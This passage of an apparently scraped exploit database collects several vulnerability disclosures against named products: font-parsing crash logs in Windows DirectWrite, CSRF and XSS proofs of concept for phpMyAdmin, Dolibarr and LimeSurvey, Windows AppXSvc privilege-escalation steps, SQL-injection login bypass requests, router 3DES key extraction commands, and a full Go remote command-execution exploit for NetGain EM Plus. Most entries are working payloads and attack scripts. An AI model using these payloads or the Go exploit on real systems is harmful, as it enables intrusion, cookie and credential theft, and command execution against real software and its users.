0f 000000a3`a00ed600 00007ffe`bf50143b d2d1!DrawingContext::Flush+0x96
10 000000a3`a00ed660 00007ffe`99d3551e d2d1!D2DDeviceContextBase<ID2D1DeviceContext6,ID2D1DeviceContext6,null_type>::EndDraw+0x13b
11 000000a3`a00ed7a0 00007ffe`99bca704 edgehtml!CDXRenderTarget::EndDrawD2D+0x66
12 000000a3`a00ed7d0 00007ffe`99bca4e8 edgehtml!CDXRenderTarget::EnsureRenderMode+0x184
13 000000a3`a00ed800 00007ffe`99d2db85 edgehtml!CDXRenderTarget::EndDraw+0x38
14 000000a3`a00ed850 00007ffe`99d2da0b edgehtml!CDispSurface::EndLayerToRenderTarget+0x145
15 000000a3`a00ed8f0 00007ffe`99bb585f edgehtml!CDispNodeDestination::EndRender+0x6b
16 000000a3`a00ed960 00007ffe`99cf60c1 edgehtml!CDispNodeDestination::EndRect+0xaf
17 000000a3`a00ed9a0 00007ffe`99bacf83 edgehtml!CDispDestinationDrawHelper::EndRect+0x31
18 000000a3`a00ed9d0 00007ffe`99b6e055 edgehtml!CDispContainer::DrawSelfContent+0x583
19 000000a3`a00edb40 00007ffe`99b6f37e edgehtml!CDispContainer::DrawSelf+0x365
1a 000000a3`a00edcd0 00007ffe`99baee43 edgehtml!CDispNode::DrawInternal+0x7ce
1b 000000a3`a00ee060 00007ffe`99bad747 edgehtml!CDispNode::Draw+0x943
1c 000000a3`a00ee270 00007ffe`99bad297 edgehtml!CDispContainer::DrawChildren+0x227
1d 000000a3`a00ee330 00007ffe`99bacbc8 edgehtml!CDispContainer::DrawSelfContentFullStackingContext+0x127
1e 000000a3`a00ee420 00007ffe`99b6e055 edgehtml!CDispContainer::DrawSelfContent+0x1c8
1f 000000a3`a00ee590 00007ffe`99b6f37e edgehtml!CDispContainer::DrawSelf+0x365
20 000000a3`a00ee720 00007ffe`99baead3 edgehtml!CDispNode::DrawInternal+0x7ce
21 000000a3`a00eeab0 00007ffe`99bba8fc edgehtml!CDispNode::Draw+0x5d3
22 000000a3`a00eecc0 00007ffe`99bb9b68 edgehtml!CDispRoot::DrawIndependentCompositionLayerTree+0x5c
23 000000a3`a00eedb0 00007ffe`99bb97f5 edgehtml!CDispRoot::DrawRoot+0x1b8
24 000000a3`a00ef000 00007ffe`99c3452c edgehtml!CPaintHandler::RenderInternal+0x2b5
25 000000a3`a00ef580 00007ffe`99b54ac8 edgehtml!CPaintHandler::RenderIfNeeded+0x7c
26 000000a3`a00ef5f0 00007ffe`99d3a80d edgehtml!CRenderThread::ProcessRenderWork+0xdc
27 000000a3`a00ef650 00007ffe`99c5fdb9 edgehtml!CRenderTaskDrawInPlace::Execute+0xad
28 000000a3`a00ef6c0 00007ffe`99d77542 edgehtml!CRenderThread::RenderThread+0x229
29 000000a3`a00ef760 00007ffe`c32937e4 edgehtml!CRenderThread::StaticRenderThreadProc+0x42
2a 000000a3`a00ef790 00007ffe`c5e1cb81 KERNEL32!BaseThreadInitThunk+0x14
2b 000000a3`a00ef7c0 00000000`00000000 ntdll!RtlUserThreadStart+0x21
--- cut ---
We have minimized the test cases to a 1-byte difference in the EBLC table, and a 2-byte difference in the EBDT table in relation to the original files.
The issue reproduces on a fully updated Windows 10 1709; we haven't tested other versions of the system. It could be used to disclose sensitive data from the process address space, which is clearly visible when opening the PoC HTML files in Edge. In most cases, instead of crashing, the browser will display random chunks of heap memory residing after the glyph's bitmap allocation. As shown in 1/poc.html and 2/poc.html, the problems are related to glyphs corresponding to characters with codes 0xF0 and 0x2020, respectively.
Attached is a pair of minimized PoC fonts, original fonts, and HTML files to reproduce the bug in a browser.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/47382.zip
Microsoft DirectWrite is a modern Windows API for high-quality text rendering. A majority of its code resides in the DWrite.dll user-mode library. It is used by a variety of widely used desktop programs (such as the Chrome, Firefox and Edge browsers) and constitutes an attack surface for memory corruption bugs, as it performs the processing of untrusted font files and is written in C/C++.
Through fuzzing, we have discovered a crash caused by an invalid memory read in DWrite!SplicePixel, while rasterizing the glyphs of a slightly malformed OpenType font. The problem reproduces in all major browsers; below is a crash log from the Microsoft Edge renderer process, generated when trying to open a web page with the proof-of-concept font embedded:
--- cut ---
(281c.25d4): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
DWrite!SplicePixel+0x14b:
00007fff`b8634473 488b14f0 mov rdx,qword ptr [rax+rsi*8] ds:00000227`c62d95b0=????????????????
0:031> u
DWrite!SplicePixel+0x14b:
00007fff`b8634473 488b14f0 mov rdx,qword ptr [rax+rsi*8]
00007fff`b8634477 4885d2 test rdx,rdx
00007fff`b863447a 7474 je DWrite!SplicePixel+0x1c8 (00007fff`b86344f0)
00007fff`b863447c 458d4b01 lea r9d,[r11+1]
00007fff`b8634480 8b4208 mov eax,dword ptr [rdx+8]
00007fff`b8634483 413bc1 cmp eax,r9d
00007fff`b8634486 7f68 jg DWrite!SplicePixel+0x1c8 (00007fff`b86344f0)
00007fff`b8634488 488b0a mov rcx,qword ptr [rdx]
0:031> ? rax
Evaluate expression: 2369851854688 = 00000227`c62d8f60
0:031> ? rsi
Evaluate expression: 202 = 00000000`000000ca
0:031> dd rax
00000227`c62d8f60 ???????? ???????? ???????? ????????
00000227`c62d8f70 ???????? ???????? ???????? ????????
00000227`c62d8f80 ???????? ???????? ???????? ????????
00000227`c62d8f90 ???????? ???????? ???????? ????????
00000227`c62d8fa0 ???????? ???????? ???????? ????????
00000227`c62d8fb0 ???????? ???????? ???????? ????????
00000227`c62d8fc0 ???????? ???????? ???????? ????????
00000227`c62d8fd0 ???????? ???????? ???????? ????????
0:031> k
# Child-SP RetAddr Call Site
00 000000b4`ceaebe00 00007fff`b8634306 DWrite!SplicePixel+0x14b
01 000000b4`ceaebe50 00007fff`b8633325 DWrite!SetPixelInDropOut+0x9a
02 000000b4`ceaebe90 00007fff`b86322a8 DWrite!FillInInflection+0xcd
03 000000b4`ceaebf00 00007fff`b863281b DWrite!DoXInflections+0x118
04 000000b4`ceaebf40 00007fff`b86319ca DWrite!EditBlackSpace+0x29f
05 000000b4`ceaebfa0 00007fff`b8636118 DWrite!CScan+0x72
06 000000b4`ceaebff0 00007fff`b855b1b2 DWrite!CScanFill+0x204
07 000000b4`ceaec0e0 00007fff`b848ccef DWrite!DoType1InterpretCharString+0xcd77a
08 000000b4`ceaec790 00007fff`b862ea16 DWrite!Type1InterpretCharString+0x163
09 000000b4`ceaec880 00007fff`b862dd49 DWrite!BuildRuns+0x186
0a 000000b4`ceaec9b0 00007fff`b862b2b9 DWrite!ATMBuildBitMap+0xb9
0b 000000b4`ceaeca80 00007fff`b85b88b7 DWrite!AdobeInternalGetBitmap+0x31d
0c 000000b4`ceaecd20 00007fff`b85b877a DWrite!CffRasterizer::Implementation::GetBitmap+0x11f
0d 000000b4`ceaece60 00007fff`b84e2c89 DWrite!CffRasterizer::GetBitmap+0x2a
0e 000000b4`ceaecea0 00007fff`b84b1754 DWrite!GlyphBitmapRasterizationState::RasterizeGlyph+0x111
0f 000000b4`ceaecee0 00007fff`c8e3e1ce DWrite!DWriteGlyphLookupCache::GetGlyphBitmapInfo+0x264
10 000000b4`ceaed150 00007fff`c8e3e95f d2d1!GlyphRunAnalyzer::AddCachedGlyph+0x62
11 000000b4`ceaed200 00007fff`c8e460b0 d2d1!GlyphRunAnalyzer::GetGlyphs+0x18f
12 000000b4`ceaed250 00007fff`c8e5572d d2d1!GlyphRunRenderer::InitForRendering+0x2c0
13 000000b4`ceaed390 00007fff`c8ebffe4 d2d1!CHwSurfaceRenderTarget::DrawGlyphRun+0x38d
14 000000b4`ceaed6a0 00007fff`c8e5379e d2d1!BrushRedirectionCompatibleCommand<CCommand_DrawGlyphRun,0>::Execute+0x134
15 000000b4`ceaed7b0 00007fff`c8e6e7ef d2d1!CHwSurfaceRenderTarget::ProcessBatch+0x3ce
16 000000b4`ceaed860 00007fff`c8e6a0ae d2d1!CBatchSerializer::FlushInternal+0x13f
17 000000b4`ceaed8f0 00007fff`c8e6143b d2d1!DrawingContext::Flush+0x96
18 000000b4`ceaed950 00007fff`9dba551e d2d1!D2DDeviceContextBase<ID2D1DeviceContext6,ID2D1DeviceContext6,null_type>::EndDraw+0x13b
19 000000b4`ceaeda90 00007fff`9da3a704 edgehtml!CDXRenderTarget::EndDrawD2D+0x66
1a 000000b4`ceaedac0 00007fff`9da3a4e8 edgehtml!CDXRenderTarget::EnsureRenderMode+0x184
1b 000000b4`ceaedaf0 00007fff`9db9db85 edgehtml!CDXRenderTarget::EndDraw+0x38
1c 000000b4`ceaedb40 00007fff`9db9da0b edgehtml!CDispSurface::EndLayerToRenderTarget+0x145
1d 000000b4`ceaedbe0 00007fff`9da2585f edgehtml!CDispNodeDestination::EndRender+0x6b
1e 000000b4`ceaedc50 00007fff`9db660c1 edgehtml!CDispNodeDestination::EndRect+0xaf
1f 000000b4`ceaedc90 00007fff`9da1cf83 edgehtml!CDispDestinationDrawHelper::EndRect+0x31
20 000000b4`ceaedcc0 00007fff`9d9de055 edgehtml!CDispContainer::DrawSelfContent+0x583
21 000000b4`ceaede30 00007fff`9d9df37e edgehtml!CDispContainer::DrawSelf+0x365
22 000000b4`ceaedfc0 00007fff`9da1ee43 edgehtml!CDispNode::DrawInternal+0x7ce
23 000000b4`ceaee350 00007fff`9da1d747 edgehtml!CDispNode::Draw+0x943
24 000000b4`ceaee560 00007fff`9da1d297 edgehtml!CDispContainer::DrawChildren+0x227
25 000000b4`ceaee620 00007fff`9da1cbc8 edgehtml!CDispContainer::DrawSelfContentFullStackingContext+0x127
26 000000b4`ceaee710 00007fff`9d9de055 edgehtml!CDispContainer::DrawSelfContent+0x1c8
27 000000b4`ceaee880 00007fff`9d9df37e edgehtml!CDispContainer::DrawSelf+0x365
28 000000b4`ceaeea10 00007fff`9da1ead3 edgehtml!CDispNode::DrawInternal+0x7ce
29 000000b4`ceaeeda0 00007fff`9da2a8fc edgehtml!CDispNode::Draw+0x5d3
2a 000000b4`ceaeefb0 00007fff`9da29b68 edgehtml!CDispRoot::DrawIndependentCompositionLayerTree+0x5c
2b 000000b4`ceaef0a0 00007fff`9da297f5 edgehtml!CDispRoot::DrawRoot+0x1b8
2c 000000b4`ceaef2f0 00007fff`9daa452c edgehtml!CPaintHandler::RenderInternal+0x2b5
2d 000000b4`ceaef870 00007fff`9d9c4ac8 edgehtml!CPaintHandler::RenderIfNeeded+0x7c
2e 000000b4`ceaef8e0 00007fff`9dbaa80d edgehtml!CRenderThread::ProcessRenderWork+0xdc
2f 000000b4`ceaef940 00007fff`9dacfdb9 edgehtml!CRenderTaskDrawInPlace::Execute+0xad
30 000000b4`ceaef9b0 00007fff`9dbe7542 edgehtml!CRenderThread::RenderThread+0x229
31 000000b4`ceaefa50 00007fff`cec537e4 edgehtml!CRenderThread::StaticRenderThreadProc+0x42
32 000000b4`ceaefa80 00007fff`cf5bcb81 KERNEL32!BaseThreadInitThunk+0x14
33 000000b4`ceaefab0 00000000`00000000 ntdll!RtlUserThreadStart+0x21
--- cut ---
We have minimized the test case to a single-byte difference in relation to the original file. When decompiled with the "ttx" utility from the fontTools package, the difference becomes obvious: it's a change of one of the FontMatrix values inside the CFF table.
Original data:
<FontMatrix value="0.001 0.0 0.000123 0.001 0.0 0.0"/>
Mutated data:
<FontMatrix value="0.001 2000000.0 0.000123 0.001 0.0 0.0"/>
The issue reproduces on a fully updated Windows 7 and Windows 10 1709; we haven't tested other versions of the system. It could be potentially used to disclose sensitive data from the process address space. It is easiest to reproduce with PageHeap enabled, but it is also possible to observe a crash in a default system configuration. Attached are the minimized PoC font, original font, an HTML file to reproduce the bug in a browser, and 3 extra non-minimized samples which also trigger the crash.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/47381.zip
=============================================
MGC ALERT 2019-003
- Original release date: June 13, 2019
- Last revised: September 13, 2019
- Discovered by: Manuel Garcia Cardenas
- Severity: 4,3/10 (CVSS Base Score)
- CVE-ID: CVE-2019-12922
=============================================
I. VULNERABILITY
-------------------------
phpMyAdmin 4.9.0.1 - Cross-Site Request Forgery
II. BACKGROUND
-------------------------
phpMyAdmin is a free software tool written in PHP, intended to handle the
administration of MySQL over the Web. phpMyAdmin supports a wide range of
operations on MySQL and MariaDB.
III. DESCRIPTION
-------------------------
Has been detected a Cross-Site Request Forgery in phpMyAdmin, that allows
an attacker to trigger a CSRF attack against a phpMyAdmin user deleting any
server in the Setup page.
IV. PROOF OF CONCEPT
-------------------------
Exploit CSRF - Deleting main server
<p>Deleting Server 1</p>
<img src="
http://server/phpmyadmin/setup/index.php?page=servers&mode=remove&id=1"
style="display:none;" />
V. BUSINESS IMPACT
-------------------------
The attacker can easily create a fake hyperlink containing the request that
wants to execute on behalf the user,in this way making possible a CSRF
attack due to the wrong use of HTTP method.
VI. SYSTEMS AFFECTED
-------------------------
phpMyAdmin <= 4.9.0.1
VII. SOLUTION
-------------------------
Implement in each call the validation of the token variable, as already
done in other phpMyAdmin requests.
VIII. REFERENCES
-------------------------
https://www.phpmyadmin.net/
IX. CREDITS
-------------------------
This vulnerability has been discovered and reported
by Manuel Garcia Cardenas (advidsec (at) gmail (dot) com).
X. REVISION HISTORY
-------------------------
June 13, 2019 1: Initial release
September 13, 2019 2: Last revision
XI. DISCLOSURE TIMELINE
-------------------------
June 13, 2019 1: Vulnerability acquired by Manuel Garcia Cardenas
June 13, 2019 2: Send to vendor
July 16, 2019 3: New request to vendor without fix date
September 13, 2019 4: Sent to lists
XII. LEGAL NOTICES
-------------------------
The information contained within this advisory is supplied "as-is" with no
warranties or guarantees of fitness of use or otherwise.
XIII. ABOUT
-------------------------
Manuel Garcia Cardenas
Pentester
# Exploit Title: Dolibarr ERP/CRM 10.0.1 - User-Agent Http Header Cross
Site Scripting
# Exploit Author: Metin Yunus Kandemir (kandemir)
# Vendor Homepage: https://www.dolibarr.org/
# Software Link: https://www.dolibarr.org/downloads
# Version: 10.0.1
# Category: Webapps
# Tested on: Xampp for Linux
# CVE: CVE-2019-16197
# Software Description : Dolibarr ERP & CRM is a modern and easy to use
software package to manage your business...
==================================================================
Description: In htdocs/societe/card.php in Dolibarr 10.0.1, the value of
the User-Agent HTTP header is copied into the HTML document as plain text
between tags, leading to XSS.
GET /dolibarr-10.0.1/htdocs/societe/card.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0ab<script>alert("XSS")</script>
SEC Consult Vulnerability Lab Security Advisory < 20190912-0 >
=======================================================================
title: Stored and reflected XSS vulnerabilities
product: LimeSurvey
vulnerable version: <= 3.17.13
fixed version: =>3.17.14
CVE number: CVE-2019-16172, CVE-2019-16173
impact: medium
homepage: https://www.limesurvey.org/
found: 2019-08-23
by: Andreas Kolbeck (Office Munich)
David Haintz (Office Vienna)
SEC Consult Vulnerability Lab
An integrated part of SEC Consult
Europe | Asia | North America
https://www.sec-consult.com
=======================================================================
Vendor description:
-------------------
"LimeSurvey is the tool to use for your online surveys. Whether you are
conducting simple questionnaires with just a couple of questions or advanced
assessments with conditionals and quota management, LimeSurvey has got you
covered. LimeSurvey is 100% open source and will always be transparently developed.
We can help you reach your goals."
Source: https://www.limesurvey.org/
Business recommendation:
------------------------
LimeSurvey suffered from a vulnerability due to improper input
and output validation. By exploiting this vulnerability an attacker could:
1. Attack other users of the web application with JavaScript code,
browser exploits or Trojan horses, or
2. perform unauthorized actions in the name of another logged-in user.
The vendor provides a patch which should be installed immediately.
Furthermore, a thorough security analysis is highly recommended as only a
short spot check has been performed and additional issues are to be expected.
Vulnerability overview/description:
-----------------------------------
1) Stored and reflected XSS vulnerabilities
LimeSurvey suffers from a stored and reflected cross-site scripting vulnerability,
which allows an attacker to execute JavaScript code with the permissions of the victim.
In this way it is possible to escalate privileges from a low-privileged account e.g.
to "SuperAdmin".
Proof of concept:
-----------------
1) Stored and reflected XSS vulnerabilities
Example 1 - Stored XSS (CVE-2019-16172):
The attacker needs the appropriate permissions in order to create new survey groups.
Then create a survey group with a JavaScript payload in the title, for example:
test<svg/onload=alert(document.cookie)>
When the survey group is being deleted, e.g. by an administrative user, the JavaScript
code will be executed as part of the "success" message.
Example 2 - Reflected XSS (CVE-2019-16173):
The following proof of concept prints the current CSRF token cookie which contains the
CSRF token. The parameter "surveyid" is not filtered properly:
http://$host/index.php/admin/survey?mandatory=1&sid=xxx&surveyid=xxx%22%3E%3Cimg%20
src=x%20onerror=%22alert(document.cookie)%22%3E&sa=listquestions&sort=question
If the URL schema is configured differently the following payload works:
http://$host/index.php?r=admin/survey&mandatory=1&sid=xxx&surveyid=
xxx"><img%20src=x%20onerror="alert(document.cookie)">&sa=listquestions&sort=question
Vulnerable / tested versions:
-----------------------------
The vulnerabilities have been verified to exist in version 3.17.9 and the latest
version 3.17.13. It is assumed that older versions are affected as well.
Vendor contact timeline:
------------------------
2019-08-29: Contacting vendor through https://bugs.limesurvey.org/view.php?id=15204
2019-09-02: Fixes available:
https://github.com/LimeSurvey/LimeSurvey/commit/32d6a5224327b246ee3a2a08500544e4f80f9a9a
https://github.com/LimeSurvey/LimeSurvey/commit/f1c1ad2d24eb262363511fcca2e96ce737064006
2019-09-02: Release of LimeSurvey v3.17.14 which fixes the security issues
2019-09-03: Release of LimeSurvey v3.17.15 bug fix
2019-09-12: Coordinated release of security advisory
Solution:
---------
Update to version 3.17.15 or higher:
https://www.limesurvey.org/stable-release
The vendor provides a detailed list of changes here:
https://www.limesurvey.org/limesurvey-updates/2188-limesurvey-3-17-14-build-190902-released
Workaround:
-----------
No workaround available.
Advisory URL:
-------------
https://www.sec-consult.com/en/vulnerability-lab/advisories/index.html
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
SEC Consult Vulnerability Lab
SEC Consult
Europe | Asia | North America
About SEC Consult Vulnerability Lab
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It
ensures the continued knowledge gain of SEC Consult in the field of network
and application security to stay ahead of the attacker. The SEC Consult
Vulnerability Lab supports high-quality penetration testing and the evaluation
of new offensive and defensive technologies for our customers. Hence our
customers obtain the most current information about vulnerabilities and valid
recommendation about the risk profile of new technologies.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Interested to work with the experts of SEC Consult?
Send us your application https://www.sec-consult.com/en/career/index.html
Interested in improving your cyber security with the experts of SEC Consult?
Contact our local offices https://www.sec-consult.com/en/contact/index.html
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Mail: research at sec-consult dot com
Web: https://www.sec-consult.com
Blog: http://blog.sec-consult.com
Twitter: https://twitter.com/sec_consult
EOF A. Kolbeck / @2019
#-----------------------------------------------------------------------------#
# Exploit Title: AppXSvc - Arbitrary File Security Descriptor Overwrite (EoP) #
# Date: Sep 4 2019 #
# Exploit Author: Gabor Seljan #
# Vendor Homepage: https://www.microsoft.com/ #
# Version: 17763.1.amd64fre.rs5_release.180914-1434 #
# Tested on: Windows 10 Version 1809 for x64-based Systems #
# CVE: CVE-2019-1253 #
#-----------------------------------------------------------------------------#
Summary:
AppXSvc improperly handles file hard links resulting in a low privileged user
being able to take 'Full Control' of an arbitrary file leading to elevation of
privilege.
Description:
An elevation of privilege vulnerability exists when the AppX Deployment Server
(AppXSvc) improperly handles file hard links. While researching CVE-2019-0841
originally reported by Nabeel Ahmed, I have found that AppXSvc sometimes opens
the settings.dat[.LOGx] files of Microsoft Edge for a restore operation that
modifies the security descriptor of the files. Further analyzis revealed that
the restore operation can be triggered on demand by preventing AppXSvc from
accessing the settings.dat[.LOGx] files. This can be achieved by locking the
settings.dat[.LOGx] file, resulting in 'Access Denied' and 'Sharing Violation'
errors when Edge and AppXSvc are trying to access it. Eventually the restore
operation kicks in and if the settings.dat[.LOGx] file has been replaced with
a hard link AppXSvc will overwrite the security descriptor of the target file.
A low privileged user can leverage this vulnerability to take 'Full Control'
of an arbitrary file.
Steps to reproduce:
1. Terminate Edge.
2. Create a hard link from settings.dat.LOG2 to C:\Windows\win.ini.
3. Open the hard link for reading and lock the file.
4. Start Edge and wait a few seconds for the restore operation to kick in.
5. Unlock the file and close the file handle.
Expected result:
Full access (GENERIC_ALL) to C:\Windows\win.ini is denied.
Observed result:
C:\Windows\win.ini has had it's security descriptor rewritten to grant
'Full Control' to the low privileged user.
PoC files:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/47389.zip
References:
https://github.com/sgabe/CVE-2019-1253
https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1253
https://krbtgt.pw/dacl-permissions-overwrite-privilege-escalation-cve-2019-0841
# Exploit Title: College-Management-System 1.2 - Authentication Bypass
# Author: Cakes
# Discovery Date: 2019-09-14
# Vendor Homepage: https://github.com/ajinkyabodade/College-Management-System
# Software Link: https://github.com/ajinkyabodade/College-Management-System/archive/master.zip
# Tested Version: 1.2
# Tested on OS: CentOS 7
# CVE: N/A
# Discription:
# Easy authentication bypass vulnerability on the application
# allowing the attacker to log in as the school principal.
# Simply replay the below Burp request or use Curl.
# Payload: ' or 0=0 #
POST /college/principalcheck.php HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://TARGET/college/principalcheck.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 36
Cookie: PHPSESSID=9bcu5lvfilimmvfnkinqlc61l9; Logmon=ca43r5mknahus9nu20jl9qca0q
Connection: close
Upgrade-Insecure-Requests: 1
DNT: 1
emailid='%20or%200%3d0%20#&pass=asdf
# Exploit Title: Ticket-Booking 1.4 - Authentication Bypass
# Author: Cakes
# Discovery Date: 2019-09-14
# Vendor Homepage: https://github.com/ABHIJEET-MUNESHWAR/Ticket-Booking
# Software Link: https://github.com/ABHIJEET-MUNESHWAR/Ticket-Booking/archive/master.zip
# Tested Version: 1.4
# Tested on OS: CentOS 7
# CVE: N/A
# Description:
# Easy authentication bypass vulnerability on this ticket booking application
# allowing the attacker to remove any previously booked seats
# Simply replay the below Burp request or use Curl (remember to change the Cookie Values)
POST /ticket/cancel.php HTTP/1.1
Host: Target
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://Target/ticket/login.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 50
Cookie: PHPSESSID=j9jrgserbga22a9q9u165uirh4; rental_property_manager=mq5iitk8ic80ffa8dcf28294d4
Connection: close
Upgrade-Insecure-Requests: 1
DNT: 1
userid='%20or%200%3d0%20#&password=123&save=signin
# Exploit Title: Inteno IOPSYS Gateway 3DES Key Extraction - Improper Access Restrictions
# Date: 2019-06-29
# Exploit Author: Gerard Fuguet (gerard@fuguet.cat)
# Vendor Homepage: https://www.intenogroup.com/
# Version: EG200-WU7P1U_ADAMO3.16.4-190226_1650
# Fixed Version: EG200-WU7P1U_ADAMO3.16.8-190820_0937
# Affected Component: SIP password, Info Gathering of Network Config
# Attack Type: Remote
# Tested on: Kali Linux 2019.2 against an Inteno EG200 Router
# CVE : CVE-2019-13140
# Description:
Inteno EG200 EG200-WU7P1U_ADAMO3.16.4-190226_1650 and before
firmwares routers have a JUCI ACL misconfiguration that allows
the "user" account to extract the 3DES key via JSON commands to ubus.
The 3DES key is used to decrypt the provisioning file provided by
Adamo Telecom on a public URL via cleartext HTTP.
# Attack Vectors:
To get success on the exploitation, two components are mandatory: 1.
the encrypted file (.enc) and 2. The 3DES key for decrypt it. The
encrypted file can be downloaded via HTTP URL offered by Adamo ISP
(works from any external network). Then is need to interact with the
router using WebSocket protocol to obtain the 3DES key, a web browser
like Firefox can be used as WebSocket client under the developer
tools. Session id is acquired with the same username and password of
the router (in this case, password is the same as wifi defaults). Once
3DES key is obtained through a JSON request command, .enc file can be
decrypted with the help of openssl tool.
# PoC:
Step 1: Getting the provisioning file
Download from http://inteno-provisioning.adamo.es/XXXXXXXXXXXX.enc
Where XXXXXXXXXXXX is your router’s Inteno MAC, all in capitals and without
the colons. You can also get your MAC by doing a ping to the router
and then an arp command on terminal.
Step 2: The 3DES Key
Let's communcatie by Sockets
- Using Firefox, open the router’s webpage (192.168.1.1 by default).
- Invoke the developer tools by pressing F12 and go to the Console Tab.
- Let’s create the WebSocket:
var superSocket = new WebSocket("ws://192.168.1.1/", "ubus-json")
- And creating the Log for show responses in each petition:
superSocket.onmessage = function (event) {console.log(event.data)}
- We request an ID session with the same login parameters that when access
to the router’s website. (put your wifis router password instead of
wifis-password value):
superSocket.send(JSON.stringify({"jsonrpc":"2.0","method":"call","params":["00000000000000000000000000000000","session","login",{"username":"user","password":"wifis-password"}],"id":666}))
- Now, you will obtain a response, the value of the parameter that says
“ubus_rpc_session” refers to your session’s ID, copy it to use in the next
request call.
- Requesting information about the router’s System. (put your session ID
instead of put-your-session-id-here value):
superSocket.send(JSON.stringify({"jsonrpc":"2.0","method":"call","params":["put-your-session-id-here","router.system","info",{}],"id":999}))
- On the response obtained, copy the value of the “des” parameter.
It’s 16 digits that we need convert to hexadecimal.
Step 3: Ready for Decrypting
Convert to HEX using xxd tool where XXXXXXXXXXXXXXXX is your "des" key:
echo -n XXXXXXXXXXXXXXXX | xxd -p
- Use openssl tool to decrypt your provisioning file. (Put your "des" key
instead of your-des-key-in-hex-format value and the XXXXXXXXXXXX
refers the name of your encryption provisioning file, in the -out
value, the name can be different):
openssl enc -d -des-ede -nosalt -K your-des-key-in-hex-format -in XXXXXXXXXXXX.enc -out XXXXXXXXXXXX.tar.gz
- Uncompress the decrypted file:
tar -xzvf XXXXXXXXXXXX.tar.gz
- You get the file: Provisioning.conf.
- Showing the file:
cat Provisioning.conf
- The end of the line refers to the secret, the password of your
SIP account.
A video was created to show all these Steps in action:
https://youtu.be/uObz1uE5P4s
# Additional Information:
A packet sniffer like Wireshark can be used for retrieve the 3DES key
instead of using WebSocket communication protocol. In that case, user
needs to do the login on the router's page, and then the JSON request
containing the 3DES key will be catched.
# References:
https://twitter.com/GerardFuguet/status/1169298861782896642
https://www.slideshare.net/fuguet/call-your-key-to-phone-all
# Timeline:
2019-06-29 - White Paper done
2019-07-01 - CVE assigned
2019-07-09 - Notified to Inteno
2019-07-11 - Adamo aware and ask for detailed info
2019-07-12 - Info facilitated
2019-07-25 - Early patch available and applied (Cooperation starts)
2019-07-26 - Tested and failed (VoIP not working)
2019-08-27 - New firmware available
2019-08-30 - Firmware EG200-WU7P1U_ADAMO3.16.8-190820_0937 applied on router
2019-08-31 - Tested OK
2019-09-04 - Disclosure published
/********************************************************************************
# Exploit Title: NetGain EM Plus <= v10.1.68 - Unauthorized Local File Inclusion
# Date: 15 September 2019
# Exploit Author: azams / @TheRealAzams
# Vendor Homepage: http://netgain-systems.com
# Software Link: http://www.netgain-systems.com/free/
# Version: v10.1.68
# Tested on: Linux
#
# Install golang: https://golang.org/doc/install
# Compile exploit: go build exploit.go
# Run exploit without compiling: go run exploit.go
# Shouts: Rix, Channisa, Ridho7ul & Horangi!
*********************************************************************************/
package main
import (
"crypto/tls"
"fmt"
"io/ioutil"
"net/http"
"net/url"
"os"
"strings"
)
var (
target string
port string
cmd string
)
func main() {
for i := range os.Args {
if os.Args[i] == "-u" {
target = os.Args[i+1]
} else if os.Args[i] == "-p" {
port = os.Args[i+1]
} else if os.Args[i] == "-cmd" {
cmd = os.Args[i+1]
}
}
if target != "" || port != "" || cmd != "" {
cmd = "type=sh&content=%232Fbin%2Fsh%0Aecho+'0xdeadnoob'%0a" + cmd + "%0aecho+'0xdeadnoob'&args=&count=0&ip=localhost"
status, body := exploit()
if strings.Contains(status, "200") {
fmt.Println("Status Code: " + status)
result := strings.Split(body, "0xdeadnoob")
fmt.Println("Result: \n" + strings.Trim(result[1], "\n"))
return
}
fmt.Println("Exploit failed!")
} else {
fmt.Println("Usage: ./exploit -u http://127.0.0.1 -p 8181 -cmd 'id;'")
}
}
func exploit() (string, string) {
tbTransport := &http.Transport{TLSClientConfig: &tls.Config{InsecureSkipVerify: true}}
client := &http.Client{Transport: tbTransport}
datas, err := url.ParseQuery(cmd)
req, err := http.NewRequest("POST", target+":"+port+"/u/jsp/designer/script_test.jsp", strings.NewReader(datas.Encode()))
req.Header.Set("Content-type", "application/x-www-form-urlencoded")
resp, err := client.Do(req)
if err != nil {
panic(err)
}
defer resp.Body.Close()
body, _ := ioutil.ReadAll(resp.Body)
return resp.Status, string(body)
}
#--------------------------------------------------------------------#
# Exploit Title: Enigma NMS Cross-Site Request Forgery (CSRF) #
# Date: 21 July 2019 #
# Author: Mark Cross (@xerubus | mogozobo.com) #
# Vendor: NETSAS Pty Ltd #
# Vendor Homepage: https://www.netsas.com.au/ #
# Software Link: https://www.netsas.com.au/enigma-nms-introduction/ #
# Version: Enigma NMS 65.0.0 #
# CVE-IDs: CVE-2019-16068 #
# Full write-up: https://www.mogozobo.com/?p=3647 #
#--------------------------------------------------------------------#
_ _
___ (~ )( ~)
/ \_\ \/ /
| D_ ]\ \/ -= Enigma CSRF by @xerubus =-
| D _]/\ \ -= We all have something to hide =-
\___/ / /\ \\
